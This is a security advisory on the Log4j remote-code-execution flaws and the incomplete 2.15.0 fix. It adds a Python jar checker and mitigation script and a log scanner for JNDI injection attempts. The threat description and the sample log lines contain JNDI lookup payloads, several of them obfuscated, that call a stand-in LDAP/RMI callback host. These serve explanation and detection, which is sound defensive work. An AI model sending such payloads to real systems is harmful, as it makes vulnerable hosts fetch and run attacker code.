
Cybersecurity Threat Advisory 0083-21: Second Log4j Vulnerability Patch Released

Threat Update

Over the past week, many organizations have been releasing security updates to address the Apache Log4j zero-day vulnerability (CVE-2021-44228), which is being actively exploited in the wild. Although Apache released an initial fix in Log4j 2.15.0, that fix was found to be incomplete in certain non-default configurations. In response, Apache has released a second update, Log4j 2.16.0, which is intended to close the vulnerability entirely.

Technical Detail & Additional Information

WHAT IS THE THREAT?

The Log4j Remote Code Execution (RCE) vulnerability is tracked as CVE-2021-44228. When message lookup substitution is enabled, an attacker who controls log messages or log message parameters can inject a JNDI lookup string (for example, ${jndi:ldap://<attacker host>/a}) and have Log4j load and execute arbitrary code fetched from an attacker-controlled LDAP server. The first fix, Log4j 2.15.0, disabled this behaviour by default, but it was found to be incomplete in certain non-default configurations: when the logging configuration uses a non-default Pattern Layout with a Context Lookup (such as $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc or %MDC), an attacker who controls Thread Context Map (MDC) input data can still get a JNDI lookup pattern evaluated. This gap is tracked separately as CVE-2021-45046. The latest release, Log4j 2.16.0, removes support for message lookup patterns altogether and disables JNDI functionality by default. For releases prior to 2.16.0, the issue can also be mitigated by removing the JndiLookup class from the classpath. Note that the earlier configuration-only mitigation of setting the system property log4j2.formatMsgNoLookups to true does not address CVE-2021-45046 and should not be relied on in place of the upgrade or the class removal.
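As an added illustration (not code from this advisory or from the Log4j project), the following Python script shows the check a practitioner would run against the log4j-core jars on a host, and the JndiLookup class removal mitigation mentioned above, which has the same effect as the Apache-documented command `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. The jar-internal paths are the real Log4j 2.x layout; the `make_sample_jar` helper builds a constructed stand-in jar with placeholder bytes so the script runs offline, and the 2.16.0 threshold follows this advisory's recommendation.

```python
import re
import tempfile
import zipfile
from pathlib import Path

# Paths inside a real log4j-core jar (Log4j 2.x layout).
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_VERSION = (2, 16, 0)   # the release this advisory recommends


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); qualifiers such as '2.0-beta9' become (2, 0, 0)."""
    nums = [int(n) for n in re.findall(r"\d+", text.split("-")[0])][:3]
    return tuple(nums + [0] * (3 - len(nums)))


def assess_jar(jar_path):
    """Report the log4j-core version and whether JndiLookup.class is still shipped."""
    with zipfile.ZipFile(jar_path) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    has_lookup = JNDI_LOOKUP_CLASS in names
    # An unknown version with the class present is treated as outdated, not ignored.
    outdated = version is None or parse_version(version) < FIXED_VERSION
    return {
        "jar": str(jar_path),
        "version": version,
        "has_jndi_lookup": has_lookup,
        # Action needed: lookup class present and version below 2.16.0 (or unknown).
        "needs_action": has_lookup and outdated,
    }


def remove_jndi_lookup(jar_path):
    """Rewrite the jar without JndiLookup.class (the pre-2.16.0 mitigation).
    Returns True when the class is gone afterwards."""
    jar_path = Path(jar_path)
    tmp = jar_path.with_name(jar_path.name + ".tmp")
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for item in src.infolist():
            if item.filename != JNDI_LOOKUP_CLASS:
                dst.writestr(item, src.read(item.filename))
    tmp.replace(jar_path)
    return not assess_jar(jar_path)["has_jndi_lookup"]


def find_log4j_core_jars(root):
    """Yield every log4j-core*.jar under root (jars nested inside wars are not expanded)."""
    for path in Path(root).rglob("log4j-core*.jar"):
        yield path


def make_sample_jar(version, with_lookup=True, directory=None):
    """Constructed stand-in for a log4j-core jar so the checks run offline.
    The class entry holds placeholder bytes, not real bytecode."""
    directory = Path(directory or tempfile.mkdtemp())
    path = directory / f"log4j-core-{version}.jar"
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPERTIES, "groupId=org.apache.logging.log4j\n"
                                    f"artifactId=log4j-core\nversion={version}\n")
        if with_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe placeholder")
    return path


if __name__ == "__main__":
    sample_dir = make_sample_jar("2.14.1").parent
    make_sample_jar("2.16.0", directory=sample_dir)
    for jar in find_log4j_core_jars(sample_dir):
        report = assess_jar(jar)
        print(report)
        if report["needs_action"]:
            print("removed JndiLookup:", remove_jndi_lookup(jar), assess_jar(jar))
```

The version gate matters: 2.16.0 still ships JndiLookup.class but disables JNDI by default, so the presence of the class alone is not the signal; the script only flags jars that are both below 2.16.0 and still carry the class. Jars bundled inside application archives (wars, ears, fat jars) are not opened here and need a separate pass.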

WHY IS IT NOTEWORTHY?

Log4j is practically omnipresent in websites and Java software generally: developers use it to log information from their applications for debugging and other tracking purposes. Because the injected lookup resolves a JNDI name, LDAP, RMI and other JNDI endpoints controlled by a threat actor can serve as avenues for executing arbitrary code on the vulnerable host. Many malicious actors and threat groups are already using this vulnerability to gain unauthorized access. Given the magnitude of the vulnerability, confirmed detections are expected to keep growing and mitigation will be slower than usual. NIST has given CVE-2021-44228 a CVSS base score of 10.0, the most critical rating possible.
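To illustrate what a log-based detection for these JNDI callbacks has to handle, here is an added Python example; it is not the SKOUT rule set and not part of the original advisory. A naive search for the text "jndi" misses the obfuscations seen in exploit attempts, so the example first collapses nested lookups the way Log4j's substitutor evaluates them, innermost first (the ${lower:...} and ${upper:...} lookups and the ${...:-x} default-value syntax), and only then matches ${jndi:<scheme>://host:port/...} and extracts the scheme and callback host. The access-log lines are constructed for the example and use TEST-NET addresses.

```python
import re

# Innermost ${...} lookup: one that contains no further '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A resolved JNDI lookup: ${jndi:<scheme>:[//]<host>[:<port>]...}
JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+):(?://)?(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


def _resolve(match):
    """Evaluate one innermost lookup for the handful of lookups attackers use to
    hide the string 'jndi'; a jndi lookup itself is left intact for detection."""
    content = match.group(1)
    low = content.lower()
    if low.startswith("jndi:"):
        return match.group(0)             # keep: this is what we want to detect
    if low.startswith("lower:"):
        return content[6:].lower()        # ${lower:J} -> j
    if low.startswith("upper:"):
        return content[6:].upper()        # ${upper:j} -> J
    if ":-" in content:
        return content.split(":-", 1)[1]  # ${::-j} or ${env:NOPE:-j} -> j (default value)
    return content                        # any other lookup: keep text, drop braces


def normalize_lookups(text, max_rounds=32):
    """Collapse nested/obfuscated lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def scan_log(lines):
    """Return one finding per JNDI lookup found in the normalized log lines."""
    findings = []
    for number, line in enumerate(lines, 1):
        normalized = normalize_lookups(line)
        for m in JNDI_LOOKUP.finditer(normalized):
            findings.append({
                "line": number,
                "scheme": m["scheme"].lower(),   # ldap, ldaps, rmi, dns, ...
                "host": m["host"],               # attacker callback host
                "port": int(m["port"]) if m["port"] else None,
                "payload": m.group(0),
            })
    return findings


# Constructed web-server access log lines (not real traffic); TEST-NET addresses.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Dec/2021:21:17:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.7 - - [14/Dec/2021:21:17:06 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:r}mi://198.51.100.23:1099/obj}"',
    '203.0.113.7 - - [14/Dec/2021:21:17:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.23/x}"',
    '198.51.100.5 - - [14/Dec/2021:21:18:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The extracted scheme and host are the useful pivot points: the host is the attacker's callback server, so it can be blocked at the egress firewall and searched for in DNS and proxy logs, and an outbound LDAP or RMI connection from an application server to that host is the confirmation that the lookup was actually evaluated rather than merely logged.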

WHAT ARE THE RECOMMENDATIONS?

Barracuda MSP has implemented custom rules to detect this exploit in its SKOUT Managed XDR Log and Network Security Monitoring solutions and recommends applying this patch immediately to protect your organization.

If your organization uses Apache Log4j, it should upgrade to Log4j 2.16.0 (which requires Java 8 or later) immediately. Where an immediate upgrade is not possible, remove the JndiLookup class from the classpath as an interim mitigation.

Additionally, where Log4j is bundled inside third-party applications, only the vendor can apply the patch, so keep an eye out for application updates. This resource tracks affected components and applications: https://github.com/YfryTchsGD/Log4jAttackSurface

REFERENCES

For more in-depth information about the recommendations, please visit the following links:

If you have any questions, please contact our Security Operations Center.